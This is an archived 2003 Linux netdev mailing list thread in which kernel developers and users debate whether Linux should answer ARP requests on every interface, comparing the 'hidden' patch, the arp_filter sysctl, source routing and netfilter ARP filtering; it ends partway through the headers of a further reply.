27/07/2003 at 16:46 David S. Miller wrote: >No, your problem was completely different. The setting who show up the problem was different. The problem is the same. >Bas's problem can be solved by him giving a "preferred source" >to each of his IPV4 routes and setting the "arpfilter" sysctl >variable for his devices to "1". Yes, it's another approach to solve his problem. But he must play with routing. With the "hidden patch" the only thing he needs is to switch the feature on. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:01:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:01:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S01eFl003361 for ; Sun, 27 Jul 2003 17:01:40 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA26370; Sun, 27 Jul 2003 16:58:31 -0700 Date: Sun, 27 Jul 2003 16:58:31 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727165831.05904792.davem@redhat.com> In-Reply-To: <200307280158250677.10891156@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4319 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 01:58:25 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 16:46 David S. Miller wrote: > >Bas's problem can be solved by him giving a "preferred source" > >to each of his IPV4 routes and setting the "arpfilter" sysctl > >variable for his devices to "1". > > Yes, it's another approach to solve his problem. But he must play with routing. Precisely he must, because he has misconfigured routes for the behavior he desires. His problem is about source address selection when trying to contact a given destination. If there is no specific source address specified, the kernel may legally use any source address, and this decision extends to ARP handling as well. It's totally illogical to say that it's easier for him to patch his kernel and reboot it than fix his route configuration. From mcr@sandelman.ottawa.on.ca Sun Jul 27 17:10:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:10:14 -0700 (PDT) Received: from noxmail.sandelman.ottawa.on.ca (cyphermail.sandelman.ottawa.on.ca [192.139.46.78]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0A8Fl004195 for ; Sun, 27 Jul 2003 17:10:09 -0700 Received: from sandelman.ottawa.on.ca (desk.marajade.sandelman.ca [205.150.200.247]) by noxmail.sandelman.ottawa.on.ca (8.11.6p2/8.11.6) with ESMTP id h6S087W18340 (using TLSv1/SSLv3 with cipher EDH-RSA-DES-CBC3-SHA (168 bits) verified OK); Sun, 27 Jul 2003 20:08:17 -0400 (EDT) Received: from marajade.sandelman.ottawa.on.ca (mcr@localhost) by sandelman.ottawa.on.ca (8.12.3/8.12.3/Debian -4) with ESMTP id h6S09O96015379; Sun, 27 Jul 2003 20:09:24 -0400 To: "David S. Miller" cc: Bas Bloemsaat , marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-reply-to: Your message of "Sun, 27 Jul 2003 15:12:34 PDT." <20030727151234.6e2aa57e.davem@redhat.com> Mime-Version: 1.0 (generated by tm-edit 1.8) Content-Type: text/plain; charset=US-ASCII Date: Sun, 27 Jul 2003 20:09:24 -0400 Message-ID: <15378.1059350964@marajade.sandelman.ottawa.on.ca> From: Michael Richardson X-archive-position: 4320 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mcr@sandelman.ottawa.on.ca Precedence: bulk X-list: netdev -----BEGIN PGP SIGNED MESSAGE----- >>>>> "David" == David S Miller writes: David> Bas Bloemsaat wrote: >> I think this is unwanted behaviour. David> Not a bug. This behavior is on purpose. Yes, this was said 5 years ago when it was reported to netdev the first dozen times. I didn't buy the reasoning then, and I still do not now. I think that it is gratuitously incompatible behaviour which bites way more people in the ass than the number of people who it actually benefits. David> Use source based routes if you want to control how ARP David> responses behave in this way. David> This is becomming a FAQ. I eargerly await the FAQ. ] Out and about in Ottawa. hmmm... beer. | firewalls [ ] Michael Richardson, Sandelman Software Works, Ottawa, ON |net architect[ ] mcr@sandelman.ottawa.on.ca http://www.sandelman.ottawa.on.ca/ |device driver[ ] panic("Just another NetBSD/notebook using, kernel hacking, security guy"); [ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) Comment: Finger me for keys - custom hacks make this fully PGP2 compat iQCVAwUBPyRppYqHRg3pndX9AQGS8gP/c6X+73r48o8q5Gasg0I1rJ/lzQRHqJgL ClfjWSQalv3Xfiz/wZeLXKZ0noNsde7E+Kv9uK1YpHtjn2AiNEu4umMXbRJ5zlV4 IrwK5SbmQBK3ROdfK27dWc0JOwQejkJtpEE6cz28muSWgFrt61YcfcJ4PrSKYaj4 U7VzZtf5cTk= =yTDD -----END PGP SIGNATURE----- From carlosev@newipnet.com Sun Jul 27 17:12:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:12:18 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0CBFl004637 for ; Sun, 27 Jul 2003 17:12:12 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 42E5120642; Mon, 28 Jul 2003 02:12:09 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 746BC2092D; Mon, 28 Jul 2003 02:11:57 +0200 (CEST) Message-ID: <200307280211590888.10957DD9@192.168.128.16> In-Reply-To: <20030727165831.05904792.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 02:11:59 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6S0CBFl004637 X-archive-position: 4321 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 16:58 David S. Miller wrote: >> On 27/07/2003 at 16:46 David S. Miller wrote: >> >Bas's problem can be solved by him giving a "preferred source" >> >to each of his IPV4 routes and setting the "arpfilter" sysctl >> >variable for his devices to "1". >> >> Yes, it's another approach to solve his problem. But he must play with >routing. > >Precisely he must, because he has misconfigured routes for the >behavior he desires. > >His problem is about source address selection when trying to >contact a given destination. Bas said: == >but it turned out that this wasn't the case. On closer examination it >turned out that any ARP request to a local IP resulted in a response, >even if the devices were on different subnets or ethernet segments. == It's the "hidden" switch.... again. I suppose that Bas can confirm it. >It's totally illogical to say that it's easier for him to patch his >kernel and reboot it than fix his route configuration. Sure... it WOULD be the easiest thing if it would be into the kernel main stream. But it isn't, making linux behave different to other OS and systems without any way or feature to make it behave like the others. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:17:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:17:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0HFFl005252 for ; Sun, 27 Jul 2003 17:17:16 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA26445; Sun, 27 Jul 2003 17:14:03 -0700 Date: Sun, 27 Jul 2003 17:14:03 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727171403.6e5bcc58.davem@redhat.com> In-Reply-To: <200307280211590888.10957DD9@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4322 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev [ Please wrap your lines at 72 characters, you emails are really difficult to read and reply to, thanks. ] On Mon, 28 Jul 2003 02:11:59 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 16:58 David S. Miller wrote: > >His problem is about source address selection when trying to > >contact a given destination. > > Bas said: > == > >but it turned out that this wasn't the case. On closer examination it > >turned out that any ARP request to a local IP resulted in a response, > >even if the devices were on different subnets or ethernet segments. > == > > It's the "hidden" switch.... again. > I suppose that Bas can confirm it. This only means your problem can also be fixed by correcting your routing tables. > >It's totally illogical to say that it's easier for him to patch his > >kernel and reboot it than fix his route configuration. > > Sure... it WOULD be the easiest thing if it would be into the kernel > >main stream. But it isn't, making linux behave different to other > >OS and systems without any way or feature to make it behave like > >the others. Show me the standard that Linux violates by behaving in this way? There are none, our behavior is perfectly acceptable. Other systems do not give you the capabilities our routing layer does, such as route based source address selections. So it is no surprise that they behave differently in this area. From carlosev@newipnet.com Sun Jul 27 17:35:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:35:41 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0ZWFl006637 for ; Sun, 27 Jul 2003 17:35:33 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 78BEF20941; Mon, 28 Jul 2003 02:35:30 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id BC19620642; Mon, 28 Jul 2003 02:35:18 +0200 (CEST) Message-ID: <200307280235210263.10AADFF8@192.168.128.16> In-Reply-To: <20030727171403.6e5bcc58.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 02:35:21 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4323 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 17:14 David S. Miller wrote: >[ Please wrap your lines at 72 characters, you emails are really > difficult to read and reply to, thanks. ] Done. >This only means your problem can also be fixed by correcting >your routing tables. Playing with routing table and using arp_filter. Or using the hidden patch. Or using a tool for filtering arp as iparp or netfilter/arpfilter. IMHO "hidden" is the simpliest (provided it's compiled in the kernel). >Show me the standard that Linux violates by behaving in this way? >There are none, our behavior is perfectly acceptable. Sure it's... I have never said it's wrong, I only say that its behaviour is different to other OS and it's NOT usual. And on certain scenaries it could be a desired behaviour. >Other systems do not give you the capabilities our routing layer does, >such as route based source address selections. So it is no surprise >that they behave differently in this area. Problem is that linux is unable to behave like the other OS and systems do in a simple way. The easy way is the "hidden" patch, if it's applied in the kernel. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:39:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:39:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0dKFl007175 for ; Sun, 27 Jul 2003 17:39:20 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA26532; Sun, 27 Jul 2003 17:36:01 -0700 Date: Sun, 27 Jul 2003 17:36:00 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727173600.475d95fb.davem@redhat.com> In-Reply-To: <200307280235210263.10AADFF8@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4324 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 02:35:21 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 17:14 David S. Miller wrote: > >Other systems do not give you the capabilities our routing layer does, > >such as route based source address selections. So it is no surprise > >that they behave differently in this area. > > Problem is that linux is unable to behave like the other OS and systems > do in a simple way. > The easy way is the "hidden" patch, if it's applied in the kernel. Not true, anyone is free to design a graphical GUI or shell script (or even a wrapper for the /sbin/ip tool) that gives you the default behavior you want, without any user interaction whatsoever. From carlosev@newipnet.com Sun Jul 27 17:53:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:53:26 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0rKFl008172 for ; Sun, 27 Jul 2003 17:53:21 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 3AD2520642; Mon, 28 Jul 2003 02:53:18 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 7376A20941; Mon, 28 Jul 2003 02:53:07 +0200 (CEST) Message-ID: <200307280253090799.10BB2DF0@192.168.128.16> In-Reply-To: <20030727173600.475d95fb.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 02:53:09 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4325 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 17:36 David S. Miller wrote: >> The easy way is the "hidden" patch, if it's applied in the kernel. > >Not true, anyone is free to design a graphical GUI or shell script (or >even a wrapper for the /sbin/ip tool) that gives you the default >behavior you want, without any user interaction whatsoever. Anyone is free to do many things. But if the hidden patch and /proc switch would be in the main kernel, it would be the simpliest way to solve all these "problems" (with an echo "1" and without filtering or using iproute2). Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 17:59:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 17:59:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S0x7Fl008743 for ; Sun, 27 Jul 2003 17:59:08 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id RAA26607; Sun, 27 Jul 2003 17:55:57 -0700 Date: Sun, 27 Jul 2003 17:55:57 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727175557.1d624b36.davem@redhat.com> In-Reply-To: <200307280253090799.10BB2DF0@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4326 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 02:53:09 +0200 "Carlos Velasco" wrote: > But if the hidden patch and /proc switch would be in the main kernel, > it would be the simpliest way to solve all these "problems" (with an > echo "1" and without filtering or using iproute2). With or without your suggestion, people have to do something different. This doesn't even address all the problems there are with the hidden patch. It does things that belong on the netfilter level and not on the ARP/routing level. Again, I'd like you to read all the discussions that have happened on this topic in the past, in particular those made by Alexey Kuznetsov on this topic. He gives very clear and concise reasons why the "hidden" patch is logically doing things in the wrong part of the kernel, and therefore won't ever be put into the tree. From carlosev@newipnet.com Sun Jul 27 18:23:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 18:23:26 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S1NEFl010367 for ; Sun, 27 Jul 2003 18:23:16 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 331CB20642; Mon, 28 Jul 2003 03:23:12 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 450B520941; Mon, 28 Jul 2003 03:23:00 +0200 (CEST) Message-ID: <200307280323020667.10D68954@192.168.128.16> In-Reply-To: <20030727175557.1d624b36.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 03:23:02 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4327 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 17:55 David S. Miller wrote: >With or without your suggestion, people have to do something >different. Just enabling the hidden switch solved my setting and I think it solves most of "problem" settings. >This doesn't even address all the problems there are with >the hidden patch. It does things that belong on the netfilter >level and not on the ARP/routing level. Well... it's just your opinion... other OS and systems don't use netfilter of firewalling at all (ex. Win) and behave like with "hidden" applied. Really, the only one I have tested that not do it is Linux 2.2+ For me (not a kernel developer), my world are the OSI layers, and the isolation of the interfaces at layer 2 IMHO should be in the kernel not any firewall module that you must install, tune and configure. >Again, I'd like you to read all the discussions that have happened on >this topic in the past, in particular those made by Alexey Kuznetsov >on this topic. He gives very clear and concise reasons why the >"hidden" patch is logically doing things in the wrong part of the >kernel, and therefore won't ever be put into the tree. I will look... but doing arp filter is not a real simple solution in any way. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 18:39:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 18:39:05 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S1cxFl011660 for ; Sun, 27 Jul 2003 18:38:59 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id SAA26717; Sun, 27 Jul 2003 18:35:48 -0700 Date: Sun, 27 Jul 2003 18:35:47 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727183547.784b6ab5.davem@redhat.com> In-Reply-To: <200307280323020667.10D68954@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4328 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 03:23:02 +0200 "Carlos Velasco" wrote: > On 27/07/2003 at 17:55 David S. Miller wrote: > >With or without your suggestion, people have to do something > >different. > > Just enabling the hidden switch solved my setting and I think it solves > most of "problem" settings. So do my suggestions. I don't deny that it fixes your problem, that is not what we're talking about. We're talking about how one should fix the problem, and I'm trying to show you why "hidden" patch is not the answer to that. > >This doesn't even address all the problems there are with > >the hidden patch. It does things that belong on the netfilter > >level and not on the ARP/routing level. > > Well... it's just your opinion... other OS and systems don't use > netfilter of firewalling at all (ex. Win) and behave like with "hidden" > applied. Ummm, with "hidden" you still have to make a configuration change. Second of all, "hidden" makes the kernel behave in a non-RFC compliant way. This is the categorization that I use to determine if something belongs on the netfilter level or not. If something changes the way in which the Linux networking behaves wrt. RFCs, this "operation" belongs at the netfilter level. This is true for the "hidden" patch. It causes the system to ignore ARP requests it should respond to. On the other hand, the "arpfilter" sysctl setting makes the kernel still behave in an RFC compliant manner, it only responds to ARPs on interfaces it would use to speak to the requestor. > Really, the only one I have tested that not do it is Linux 2.2+ Yes, we removed "hidden" from 2.2.x in lieu of "arpfilter" sysctl and the netfilter ARP filtering module. > For me (not a kernel developer), my world are the OSI layers, OSI layers have nothing to do with the problem we are discussing. BTW, OSI layers are how networking stacks are described in textbooks and standards and far away from how one should implement said stack. Van Jacobson even said this once :-) > I will look... but doing arp filter is not a real simple solution in > any way. It would be really nice if people might consider that it could even be possible to make things like the IPVS layer install the appropriate NETFILTER_ARP chain rules when the IPVS configuration installed dictates that one is needed. People using IPVS wouldn't even need to do _ANYTHING_ if IPVS were to do that. And all of that would be _FINE_ because like ARP netfilter, IPVS lies inside of netfilter where such things which change networking behavior semantics radically belong. From greearb@candelatech.com Sun Jul 27 19:31:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 19:31:16 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S2V9Fl015083 for ; Sun, 27 Jul 2003 19:31:09 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6S2V1m2024167; Sun, 27 Jul 2003 19:31:02 -0700 Message-ID: <3F248AE5.4000204@candelatech.com> Date: Sun, 27 Jul 2003 19:31:01 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: Bas Bloemsaat , netdev@oss.sgi.com, layes@loran.com, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices References: <20030727151234.6e2aa57e.davem@redhat.com> In-Reply-To: <20030727151234.6e2aa57e.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4329 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Sun, 27 Jul 2003 22:52:48 +0200 (CEST) > Bas Bloemsaat wrote: > > >>I think this is unwanted behaviour. > > > Not a bug. This behavior is on purpose. What is the benefit of having it work as it does currently in the standard kernel? I too was supprised to find it works this way, but have since converted to use source-routes. Interestingly, can only use 252 or so source routes because the rfc for netlink only gives us an 8-bit identifier for the route id, so this still breaks if you want to run lots of vlans or something like that. Ben -- Ben Greear Candela Technologies Inc http://www.candelatech.com From david.lang@digitalinsight.com Sun Jul 27 21:38:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 21:38:47 -0700 (PDT) Received: from warden3.diginsite.com (warden3-p.diginsite.com [208.147.64.186]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S4ccFl026275 for ; Sun, 27 Jul 2003 21:38:39 -0700 Received: from no.name.available by warden3.diginsite.com via smtpd (for oss.SGI.COM [192.48.159.27]) with SMTP; Sun, 27 Jul 2003 21:31:53 -0700 Received: from ata-navgw-how1.anytimeaccess.com ([10.210.80.95]) by ata-mail.anytimeaccess.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with SMTP id com for ; Sun, 27 Jul 2003 21:35:07 -0700 Received: from sacexc01.digitalinsight.com ([10.210.80.155]) by ata-navgw-how1.anytimeaccess.com (NAVIEG 2.1 bld 63) with SMTP id M2003072721300223786 ; Sun, 27 Jul 2003 21:30:02 -0700 Received: by sacexc01.anytimeaccess.com with Internet Mail Service (5.5.2656.59) id ; Sun, 27 Jul 2003 21:38:34 -0700 Received: from dlang.diginsite.com ([10.201.10.67]) by wlvexc00.digitalinsight.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59) id PXM7W13K; Sun, 27 Jul 2003 21:38:28 -0700 From: David Lang To: "David S. Miller" Cc: Carlos Velasco , bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org 